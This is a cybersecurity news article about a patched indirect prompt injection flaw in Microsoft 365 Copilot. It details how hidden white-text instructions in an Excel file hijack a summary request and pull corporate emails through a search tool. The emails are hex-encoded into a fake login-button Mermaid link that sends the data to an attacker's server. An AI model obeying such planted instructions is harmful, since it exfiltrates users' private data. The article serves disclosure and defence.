https://cybersecuritynews.com/copilot-prompt-injection-vulnerability-2
A vulnerability in Microsoft 365 Copilot (M365 Copilot) has been discovered that allows attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks. The flaw exploits the AI assistant’s integration with Office documents and its built-in support for Mermaid diagrams, enabling data exfiltration without direct user interaction.
The attack begins when a user asks M365 Copilot to summarise a maliciously crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behaviour. These indirect prompts override the summarisation task, directing Copilot to invoke its search_enterprise_emails tool to retrieve recent corporate emails. The fetched content is then hex-encoded and fragmented into short lines to bypass Mermaid’s character limits.
Copilot generates a Mermaid diagram, masquerading as a “login button” secured with a lock emoji. The diagram includes CSS styling for a convincing button appearance and a hyperlink embedding the encoded email data. When the user clicks the link, believing it’s needed to access the document’s “sensitive” content, the link directs to the attacker’s server, where the hex-encoded payload can be decoded from server logs.
Microsoft has patched the vulnerability by September 2025, removing interactive hyperlinks from Copilot’s rendered Mermaid diagrams. However, this incident highlights the risks in AI tool integrations, especially for enterprise environments handling sensitive data. As LLMs like Copilot connect to APIs and internal resources, defences against indirect injections remain critical, and users are urged to verify document sources and monitor AI outputs closely.